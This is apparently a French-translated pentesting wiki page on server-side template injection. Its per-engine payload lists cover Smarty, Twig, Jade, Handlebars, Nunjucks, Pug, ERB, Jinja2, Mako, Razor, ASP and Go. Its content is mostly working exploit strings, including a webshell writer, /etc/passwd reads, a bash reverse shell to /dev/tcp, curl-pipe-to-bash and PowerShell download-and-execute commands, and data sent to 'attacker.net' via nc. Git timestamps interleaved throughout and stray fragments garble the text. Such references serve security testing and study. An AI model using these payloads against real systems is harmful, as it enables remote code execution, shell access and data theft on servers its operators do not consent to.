< figure > < img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-05 02:55:29 +00:00
[**RootedCON**](https://www.rootedcon.com/) est l'événement le plus pertinent en matière de cybersécurité en **Espagne** et l'un des plus importants en **Europe** . Avec **pour mission de promouvoir les connaissances techniques** , ce congrès est un point de rencontre bouillonnant pour les professionnels de la technologie et de la cybersécurité dans chaque discipline.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
##
2022-05-01 13:25:53 +00:00
### Smarty (PHP)
2021-06-25 12:34:30 +00:00
```php
{$smarty.version}
{php}echo `id` ;{/php} //deprecated in smarty v3
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?> ",self::clearConfig())}
{system('ls')} // compatible v3
{system('cat index.php')} // compatible v3
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
* Dans la section Smarty de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#smarty )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Twig (PHP)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
* `{{7*'7'}} = 49`
2024-02-05 02:55:29 +00:00
* `{{1/0}} = Error`
* `{{foobar}} Nothing`
2021-06-25 12:34:30 +00:00
```python
#Get Info
{{_self}} #(Ref. to current application)
{{_self.env}}
{{dump(app)}}
{{app.request.server.all|join(',')}}
#File read
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
#Exec code
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
2022-10-03 13:43:01 +00:00
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id;uname -a;hostname")}}
2021-06-25 12:34:30 +00:00
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
2024-01-10 22:21:06 +00:00
{{['id',""]|sort('system')}}
#Hide warnings and errors for automatic exploitation
{{["error_reporting", "0"]|sort("ini_set")}}
2021-06-25 12:34:30 +00:00
```
2024-03-16 10:05:23 +00:00
**Twig - Format de modèle**
2021-06-25 12:34:30 +00:00
```php
$output = $twig > render (
2023-06-25 23:30:13 +00:00
'Dear' . $_GET['custom_greeting'],
array("first_name" => $user.first_name)
2021-06-25 12:34:30 +00:00
);
$output = $twig > render (
2023-06-25 23:30:13 +00:00
"Dear {first_name}",
array("first_name" => $user.first_name)
2021-06-25 12:34:30 +00:00
);
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
* Dans la section Twig et Twig (Sandboxed) de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig )
2020-07-15 15:43:14 +00:00
2023-03-28 17:50:22 +00:00
### Plates (PHP)
2024-04-07 03:54:34 +00:00
Plates est un moteur de template natif à PHP, s'inspirant de Twig. Cependant, contrairement à Twig, qui introduit une nouvelle syntaxe, Plates utilise du code PHP natif dans les templates, le rendant intuitif pour les développeurs PHP.
2023-03-28 17:50:22 +00:00
2024-04-07 03:54:34 +00:00
Contrôleur:
2023-03-28 17:50:22 +00:00
```php
// Create new Plates instance
$templates = new League\Plates\Engine('/path/to/templates');
// Render a template
echo $templates->render('profile', ['name' => 'Jonathan']);
```
2024-02-06 14:26:08 +00:00
Modèle de page :
2023-06-25 23:30:13 +00:00
```php
<?php $this->layout('template', ['title' => 'User Profile']) ?>
2023-06-03 13:10:46 +00:00
2023-06-25 23:30:13 +00:00
< h1 > User Profile< / h1 >
< p > Hello, <?=$this->e($name)?> < / p >
```
2024-02-06 14:26:08 +00:00
Modèle de mise en page :
2023-03-28 17:50:22 +00:00
```html
< html >
2023-06-25 23:30:13 +00:00
< head >
< title > <?=$this->e($title)?> < / title >
< / head >
< body >
<?=$this->section('content')?>
< / body >
2023-03-28 17:50:22 +00:00
< / html >
```
2024-02-06 14:26:08 +00:00
**Plus d'informations**
2024-02-23 16:41:03 +00:00
2024-02-06 14:26:08 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#plates )
2023-06-03 13:10:46 +00:00
### PHPlib et HTML\_Template\_PHPLIB (PHP)
2023-03-28 17:50:22 +00:00
2024-02-06 14:26:08 +00:00
[HTML\_Template\_PHPLIB ](https://github.com/pear/HTML\_Template\_PHPLIB ) est identique à PHPlib mais porté sur Pear.
2023-03-28 17:50:22 +00:00
`authors.tpl`
```html
< html >
2023-06-25 23:30:13 +00:00
< head > < title > {PAGE_TITLE}< / title > < / head >
< body >
< table >
< caption > Authors< / caption >
< thead >
< tr > < th > Name< / th > < th > Email< / th > < / tr >
< / thead >
< tfoot >
< tr > < td colspan = "2" > {NUM_AUTHORS}< / td > < / tr >
< / tfoot >
< tbody >
2023-03-28 17:50:22 +00:00
<!-- BEGIN authorline -->
2023-06-25 23:30:13 +00:00
< tr > < td > {AUTHOR_NAME}< / td > < td > {AUTHOR_EMAIL}< / td > < / tr >
2023-03-28 17:50:22 +00:00
<!-- END authorline -->
2023-06-25 23:30:13 +00:00
< / tbody >
< / table >
< / body >
2023-03-28 17:50:22 +00:00
< / html >
```
2024-01-01 19:54:07 +00:00
`authors.php`
2023-03-28 17:50:22 +00:00
```php
< ?php
//we want to display this author list
$authors = array(
2023-06-25 23:30:13 +00:00
'Christian Weiske' => 'cweiske@php.net',
'Bjoern Schotte' => 'schotte@mayflower.de'
2023-03-28 17:50:22 +00:00
);
require_once 'HTML/Template/PHPLIB.php';
//create template object
$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
//load file
$t->setFile('authors', 'authors.tpl');
//set block
$t->setBlock('authors', 'authorline', 'authorline_ref');
//set some variables
$t->setVar('NUM_AUTHORS', count($authors));
$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));
//display the authors
foreach ($authors as $name => $email) {
2023-06-25 23:30:13 +00:00
$t->setVar('AUTHOR_NAME', $name);
$t->setVar('AUTHOR_EMAIL', $email);
$t->parse('authorline_ref', 'authorline', true);
2023-03-28 17:50:22 +00:00
}
//finish and echo
echo $t->finish($t->parse('OUT', 'authors'));
?>
```
2024-02-06 14:26:08 +00:00
**Plus d'informations**
2024-02-23 16:41:03 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html\_template\_phplib ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#phplib-and-html\_template\_phplib )
2024-02-05 02:55:29 +00:00
2022-05-01 13:25:53 +00:00
### Jade (NodeJS)
2021-06-25 12:34:30 +00:00
```javascript
- var x = root.process
- x = x.mainModule.require
- x = x('child_process')
= x.exec('id | nc attacker.net 80')
```
```javascript
#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2021-06-25 12:34:30 +00:00
2023-06-03 13:10:46 +00:00
* Dans la section Jade de [https://portswigger.net/research/server-side-template-injection ](https://portswigger.net/research/server-side-template-injection )
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen )
2020-07-15 15:43:14 +00:00
2023-03-28 17:50:22 +00:00
### patTemplate (PHP)
2024-04-07 03:54:34 +00:00
> [patTemplate](https://github.com/wernerwa/pat-template) moteur de modèle PHP non compilant, qui utilise des balises XML pour diviser un document en différentes parties
2023-03-28 17:50:22 +00:00
```xml
< patTemplate:tmpl name = "page" >
2023-06-25 23:30:13 +00:00
This is the main page.
< patTemplate:tmpl name = "foo" >
It contains another template.
< / patTemplate:tmpl >
< patTemplate:tmpl name = "hello" >
Hello {NAME}.< br / >
< / patTemplate:tmpl >
2023-03-28 17:50:22 +00:00
< / patTemplate:tmpl >
```
2024-02-06 14:26:08 +00:00
**Plus d'informations**
2024-02-23 16:41:03 +00:00
2024-02-06 14:26:08 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#pattemplate )
2022-05-01 13:25:53 +00:00
### Handlebars (NodeJS)
2020-07-15 15:43:14 +00:00
2024-02-06 14:26:08 +00:00
Traversal de chemin (plus d'informations [ici ](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/ )).
2021-02-03 09:46:19 +00:00
```bash
curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{"layout\": \"./../routes/index.js\"}}' 'http://ctf.shoebpatel.com:9090/'
```
2023-06-03 13:10:46 +00:00
* \= Erreur
2020-07-15 15:43:14 +00:00
* ${7\*7} = ${7\*7}
2023-06-03 13:10:46 +00:00
* Rien
2021-06-25 12:34:30 +00:00
```java
{{#with "s" as |string|}}
2023-06-25 23:30:13 +00:00
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
2020-07-15 15:43:14 +00:00
{{/with}}
URLencoded:
2023-07-11 13:30:24 +00:00
%7B%7B%23with%20%22s%22%20as%20%7Cstring%7C%7D%7D%0D%0A%20%20%7B%7B%23with%20%22e%22%7D%7D%0D%0A%20%20%20%20%7B%7B%23with%20split%20as%20%7Cconslist%7C%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epush%20%28lookup%20string%2Esub%20%22constructor%22%29%7D%7D%0D%0A%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%23with%20string%2Esplit%20as%20%7Ccodelist%7C%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epush%20%22return%20require%28%27child%5Fprocess%27%29%2Eexec%28%27whoami%27%29%3B%22%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7Bthis%2Epop%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%23each%20conslist%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%23with%20%28string%2Esub%2Eapply%200%20codelist%29%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7B%7Bthis%7D%7D%0D%0A%20%20%20%20%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%20%20%20%20%7B%7B%2Feach%7D%7D%0D%0A%20%20%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%20%20%7B%7B%2Fwith%7D%7D%0D%0A%20%20%7B%7B%2Fwith%7D%7D%0D%0A%7B%7B%2Fwith%7D%7D
2020-07-15 15:43:14 +00:00
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2020-07-15 15:43:14 +00:00
* [http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html ](http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html )
2022-05-01 13:25:53 +00:00
### JsRender (NodeJS)
2020-12-01 16:50:24 +00:00
2023-06-03 13:10:46 +00:00
| **Modèle** | **Description** |
2021-10-18 11:21:18 +00:00
| ------------ | --------------------------------------- |
2024-03-29 21:02:51 +00:00
| | Évaluer et afficher la sortie |
| | Évaluer et afficher la sortie encodée en HTML |
2024-03-16 10:05:23 +00:00
| | Commentaire |
| et | Autoriser le code (désactivé par défaut) |
2020-12-01 16:50:24 +00:00
2021-10-18 11:21:18 +00:00
* \= 49
2020-12-01 16:50:24 +00:00
2024-03-16 10:05:23 +00:00
**Côté client**
2021-06-25 12:34:30 +00:00
```python
2020-12-01 16:50:24 +00:00
{{:%22test%22.toString.constructor.call({},%22alert(%27xss%27)%22)()}}
```
2023-07-11 13:30:24 +00:00
**Côté Serveur**
2020-12-01 16:50:24 +00:00
```bash
{{:"pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /etc/passwd').toString()")()}}
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2020-12-01 16:50:24 +00:00
* [https://appcheck-ng.com/template-injection-jsrender-jsviews/ ](https://appcheck-ng.com/template-injection-jsrender-jsviews/ )
2022-05-01 13:25:53 +00:00
### PugJs (NodeJS)
2021-01-09 10:15:51 +00:00
2021-01-10 15:09:49 +00:00
* `#{7*7} = 49`
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('touch /tmp/pwned.txt')}()}`
2021-12-16 22:42:47 +00:00
* `#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('curl 10.10.14.3:8001/s.sh | bash')}()}`
2021-01-10 15:09:49 +00:00
2023-06-03 13:10:46 +00:00
**Exemple de rendu côté serveur**
2021-06-25 12:34:30 +00:00
```javascript
2021-01-10 15:09:49 +00:00
var pugjs = require('pug');
home = pugjs.render(injected_page)
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2021-01-09 10:15:51 +00:00
* [https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/ ](https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/ )
2022-05-01 13:25:53 +00:00
### NUNJUCKS (NodeJS) <a href="#nunjucks" id="nunjucks"></a>
2022-02-01 22:03:45 +00:00
2022-02-09 16:22:44 +00:00
* \{{7\*7\}} = 49
2024-02-05 02:55:29 +00:00
* \{{foo\}} = Aucune sortie
* \#{7\*7} = #{7\*7}
2023-06-03 13:10:46 +00:00
* \{{console.log(1)\}} = Erreur
2022-02-01 22:03:45 +00:00
```javascript
{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/10.10.14.11/6767 0>& 1\"')")()}}
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2022-02-01 22:03:45 +00:00
* [http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine ](http://disse.cting.org/2016/08/02/2016-08-02-sandbox-break-out-nunjucks-template-engine )
2022-05-01 13:25:53 +00:00
### ERB (Ruby)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = {{7*7}}`
* `${7*7} = ${7*7}`
* `<%= 7*7 %> = 49`
2024-04-07 03:54:34 +00:00
* `<%= foobar %> = Error`
2021-06-25 12:34:30 +00:00
```python
< %= system("whoami") %> #Execute code
< %= Dir.entries('/') %> #List folder
< %= File.open('/etc/passwd').read %> #Read file
< %= system('cat /etc/passwd') %>
< %= `ls /` %>
< %= IO.popen('ls /').readlines() %>
< % require 'open3' %>< % @a ,@b,@c,@d=Open3.popen3('whoami') %>< %= @b .readline()%>
< % require 'open4' %>< % @a ,@b,@c,@d=Open4.popen4('whoami') %>< %= @c .readline()%>
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2021-06-25 12:34:30 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby )
2021-06-25 12:34:30 +00:00
2022-05-01 13:25:53 +00:00
### Slim (Ruby)
2021-06-25 12:34:30 +00:00
* `{ 7 * 7 }`
2021-10-18 11:21:18 +00:00
```
2021-06-25 12:34:30 +00:00
{ %x|env| }
2020-07-15 15:43:14 +00:00
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Python
2021-06-25 16:27:28 +00:00
2024-03-29 21:02:51 +00:00
Consultez la page suivante pour apprendre des astuces sur **l'exécution de commandes arbitraires en contournant les sandbox** en python :
2021-06-25 16:27:28 +00:00
2022-05-16 08:29:00 +00:00
{% content-ref url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %}
[bypass-python-sandboxes ](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-06-25 16:27:28 +00:00
2022-05-01 13:25:53 +00:00
### Tornado (Python)
2020-07-15 15:43:14 +00:00
* `{{7*7}} = 49`
* `${7*7} = ${7*7}`
2024-02-05 02:55:29 +00:00
* `{{foobar}} = Error`
2020-07-15 15:43:14 +00:00
* `{{7*'7'}} = 7777777`
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2020-07-15 15:43:14 +00:00
{% import foobar %} = Error
2022-02-09 16:22:44 +00:00
{% import os %}
2022-09-26 09:52:47 +00:00
2022-10-03 13:43:01 +00:00
{% import os %}
2022-12-09 14:47:58 +00:00
{% endraw %}
2023-01-13 17:40:30 +00:00
2023-03-05 22:20:47 +00:00
2023-04-05 23:11:20 +00:00
2024-02-23 16:41:03 +00:00
2024-03-29 21:02:51 +00:00
2022-12-09 14:47:58 +00:00
{{os.system('whoami')}}
2022-04-06 08:57:29 +00:00
{{os.system('whoami')}}
2020-07-15 15:43:14 +00:00
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2024-02-23 16:41:03 +00:00
2024-02-06 14:26:08 +00:00
* [https://ajinabraham.com/blog/server-side-template-injection-in-tornado ](https://ajinabraham.com/blog/server-side-template-injection-in-tornado )
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Jinja2 (Python)
2021-06-25 12:34:30 +00:00
2023-06-03 13:10:46 +00:00
[Site officiel ](http://jinja.pocoo.org )
2020-07-15 15:43:14 +00:00
2024-03-26 07:59:23 +00:00
> Jinja2 est un moteur de template complet pour Python. Il prend en charge l'unicode complet, un environnement d'exécution sandboxé intégré en option, est largement utilisé et sous licence BSD.
2020-07-15 15:43:14 +00:00
2023-06-03 13:10:46 +00:00
* `{{7*7}} = Erreur`
2020-07-15 15:43:14 +00:00
* `${7*7} = ${7*7}`
2023-06-03 13:10:46 +00:00
* `{{foobar}} Rien`
2021-06-25 12:34:30 +00:00
* `{{4*4}}[[5*5]]`
* `{{7*'7'}} = 7777777`
* `{{config}}`
* `{{config.items()}}`
* `{{settings.SECRET_KEY}}`
* `{{settings}}`
2022-04-06 08:57:29 +00:00
* `<div data-gb-custom-block data-tag="debug"></div>`
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2020-07-15 15:43:14 +00:00
{% debug %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2022-06-18 20:54:28 +00:00
2023-04-05 23:11:20 +00:00
2023-04-30 21:23:47 +00:00
2024-02-23 16:41:03 +00:00
2024-03-29 21:02:51 +00:00
2020-07-15 15:43:14 +00:00
{{settings.SECRET_KEY}}
2021-06-25 12:34:30 +00:00
{{4*4}}[[5*5]]
{{7*'7'}} would result in 7777777
```
2024-01-01 19:54:07 +00:00
**Jinja2 - Format de modèle**
2021-06-25 12:34:30 +00:00
```python
2022-02-09 16:22:44 +00:00
{% raw %}
2021-06-25 12:34:30 +00:00
{% extends "layout.html" %}
{% block body %}
2023-06-25 23:30:13 +00:00
< ul >
{% for user in users %}
< li > < a href = "{{ user.url }}" > {{ user.username }}< / a > < / li >
{% endfor %}
< / ul >
2021-06-25 12:34:30 +00:00
{% endblock %}
2022-02-09 16:22:44 +00:00
{% endraw %}
2023-04-05 23:11:20 +00:00
2023-03-28 17:50:22 +00:00
```
2024-02-05 02:55:29 +00:00
[**RCE non dépendant de** ](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/ ) `__builtins__` :
2023-03-28 17:50:22 +00:00
```python
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
# Or in the shotest versions:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
2021-06-25 12:34:30 +00:00
```
2024-02-05 02:55:29 +00:00
**Plus de détails sur comment abuser de Jinja**:
2021-06-25 12:34:30 +00:00
2022-07-20 01:03:41 +00:00
{% content-ref url="jinja2-ssti.md" %}
[jinja2-ssti.md ](jinja2-ssti.md )
{% endcontent-ref %}
2021-06-07 09:30:58 +00:00
2024-02-09 02:16:20 +00:00
Autres charges utiles dans [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2 ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2 )
2024-02-06 14:26:08 +00:00
2022-05-01 13:25:53 +00:00
### Mako (Python)
2021-06-25 12:34:30 +00:00
```python
2021-06-07 09:30:58 +00:00
< %
import os
x=os.popen('id').read()
%>
${x}
```
2024-02-06 14:26:08 +00:00
**Plus d'informations**
2024-02-23 16:41:03 +00:00
2024-02-06 14:26:08 +00:00
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#mako )
2022-05-01 13:25:53 +00:00
### Razor (.Net)
2020-07-19 21:53:59 +00:00
2023-06-03 13:10:46 +00:00
* `@(2+2) <= Succès`
* `@() <= Succès`
* `@("{{code}}") <= Succès`
2024-02-05 02:55:29 +00:00
* `@ <= Succès`
* `@{} <= ERREUR!`
* `@{ <= ERREUR!`
2020-07-19 21:53:59 +00:00
* `@(1+2)`
2024-02-05 02:55:29 +00:00
* `@( //Code C# )`
2022-01-06 11:03:56 +00:00
* `@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");`
2024-04-07 03:54:34 +00:00
* `@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc IABpAHcAcgAgAC0AdQByAGkAIABoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAyAC4AMQAxADEALwB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVwBpAG4AZABvAHcAcwBCAGEAcwBrAHMAXAB0AGUAcwB0AG0AZQB0ADYANAAuAGUAeABlAA==");`
2020-07-19 21:53:59 +00:00
2024-04-07 03:54:34 +00:00
La méthode `.NET` `System.Diagnostics.Process.Start` peut être utilisée pour démarrer n'importe quel processus sur le serveur et ainsi créer un shell web. Vous pouvez trouver un exemple d'application web vulnérable dans [https://github.com/cnotin/RazorVulnerableApp ](https://github.com/cnotin/RazorVulnerableApp )
2020-07-19 21:53:59 +00:00
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2020-07-19 21:53:59 +00:00
2021-10-18 11:21:18 +00:00
* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/ ](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\ )-in-ASP.NET-Razor/)
2022-01-06 11:03:56 +00:00
* [https://www.schtech.co.uk/razor-pages-ssti-rce/ ](https://www.schtech.co.uk/razor-pages-ssti-rce/ )
2020-07-19 21:53:59 +00:00
2022-05-01 13:25:53 +00:00
### ASP
2022-02-03 15:39:58 +00:00
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
2023-06-03 13:10:46 +00:00
* `<%= foo %>` = Rien
2022-02-03 15:39:58 +00:00
* `<%= response.write(date()) %>` = \<Date>
2024-02-06 14:26:08 +00:00
```xml
2022-02-03 15:39:58 +00:00
< %= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2022-02-03 15:39:58 +00:00
2024-02-05 02:55:29 +00:00
* [https://www.w3schools.com/asp/asp\_examples.asp ](https://www.w3schools.com/asp/asp\_examples.asp )
2022-02-03 15:39:58 +00:00
2022-05-01 13:25:53 +00:00
### Mojolicious (Perl)
2020-07-26 18:06:17 +00:00
2024-03-29 21:02:51 +00:00
Même s'il s'agit de perl, il utilise des balises comme ERB en Ruby.
2020-07-26 18:06:17 +00:00
* `<%= 7*7 %> = 49`
2023-06-03 13:10:46 +00:00
* `<%= foobar %> = Erreur`
2021-10-18 11:21:18 +00:00
```
2020-07-26 18:06:17 +00:00
< %= perl code %>
< % perl code %>
```
2023-06-03 13:10:46 +00:00
### SSTI en GO
2020-07-26 18:06:17 +00:00
2024-03-29 21:02:51 +00:00
Dans le moteur de template de Go, la confirmation de son utilisation peut être faite avec des charges spécifiques :
2021-05-27 10:20:50 +00:00
2024-04-07 03:54:34 +00:00
* `{{ . }}` : Révèle l'entrée de la structure de données. Par exemple, si un objet avec un attribut `Password` est passé, `{{ .Password }}` pourrait l'exposer.
2024-02-06 14:26:08 +00:00
* `{{printf "%s" "ssti" }}` : Devrait afficher la chaîne "ssti".
2024-03-29 21:02:51 +00:00
* `{{html "ssti"}}` , `{{js "ssti"}}` : Ces charges devraient renvoyer "ssti" sans ajouter "html" ou "js". D'autres directives peuvent être explorées dans la documentation de Go [ici ](https://golang.org/pkg/text/template ).
2021-05-27 10:20:50 +00:00
2024-01-01 19:54:07 +00:00
**Exploitation XSS**
2021-05-27 10:20:50 +00:00
2024-04-07 03:54:34 +00:00
Avec le package `text/template` , les attaques XSS peuvent être directes en insérant directement la charge. En revanche, le package `html/template` encode la réponse pour empêcher cela (par exemple, `{{"<script>alert(1)</script>"}}` donne `<script>alert(1)</script>` ). Néanmoins, la définition et l'invocation de modèles en Go peuvent contourner cet encodage : \{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}
2024-03-29 21:02:51 +00:00
vbnet Copier le code
2022-02-03 00:17:18 +00:00
2024-01-01 19:54:07 +00:00
**Exploitation RCE**
2022-02-03 00:17:18 +00:00
2024-04-07 03:54:34 +00:00
L'exploitation de RCE diffère considérablement entre `html/template` et `text/template` . Le module `text/template` permet d'appeler directement n'importe quelle fonction publique (en utilisant la valeur "call"), ce qui n'est pas autorisé dans `html/template` . La documentation de ces modules est disponible [ici pour html/template ](https://golang.org/pkg/html/template/ ) et [ici pour text/template ](https://golang.org/pkg/text/template/ ).
2022-02-03 00:17:18 +00:00
2024-04-07 03:54:34 +00:00
Pour RCE via SSTI en Go, les méthodes d'objet peuvent être invoquées. Par exemple, si l'objet fourni a une méthode `System` exécutant des commandes, elle peut être exploitée comme `{{ .System "ls" }}` . L'accès au code source est généralement nécessaire pour exploiter cela, comme dans l'exemple donné :
2022-02-03 00:17:18 +00:00
```go
func (p Person) Secret (test string) string {
2023-06-25 23:30:13 +00:00
out, _ := exec.Command(test).CombinedOutput()
return string(out)
2022-02-03 00:17:18 +00:00
}
```
2023-06-03 13:10:46 +00:00
**Plus d'informations**
2022-02-03 00:17:18 +00:00
* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html ](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html )
* [https://www.onsecurity.io/blog/go-ssti-method-research/ ](https://www.onsecurity.io/blog/go-ssti-method-research/ )
2021-05-27 10:20:50 +00:00
2024-04-07 03:54:34 +00:00
### Autres exploits
2021-06-25 12:34:30 +00:00
2024-04-07 03:54:34 +00:00
